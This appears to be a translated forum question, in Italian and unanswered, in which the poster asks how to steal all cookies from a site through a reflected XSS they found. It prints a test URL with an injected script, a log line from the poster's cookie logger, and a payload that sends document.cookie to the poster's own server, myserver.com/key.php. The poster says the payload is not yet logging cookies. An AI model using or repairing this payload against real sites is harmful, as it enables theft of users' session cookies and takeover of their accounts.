Come posso rubare tutti i cookie dall'XSS riflesso?

1

Ho appena trovato un sito Web con una vulnerabilità XSS. Quando visito il seguente URL, si verifica un pop up:

https://example.com/article/HALLOWEEN"><script>alert(1);</script>

Ho un cookielogger.php sul mio server con questo codice , così che quando visito myserver.com/key.php , viene aggiunta una riga a myserver.com/log.txt come questo:

IP: 15x.1xx.xxx.xx | PORT: 58554 | HOST:  | Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 | METHOD:  | REF:  | DATE: Friday 21st 2018f September 2018 07:34:25 PM | COOKIE:  

Ma quando modifico il mio URL su questo sotto, il cookie non è registrato sul mio server

https://example.com/article/HALLOWEEN"><script language= "JavaScript">document.location="http://myserver.com/key.php?cookie=" + document.cookie;</script>
    
posta Yosua Kristanto 21.09.2018 - 21:41
fonte

0 risposte

Leggi altre domande sui tag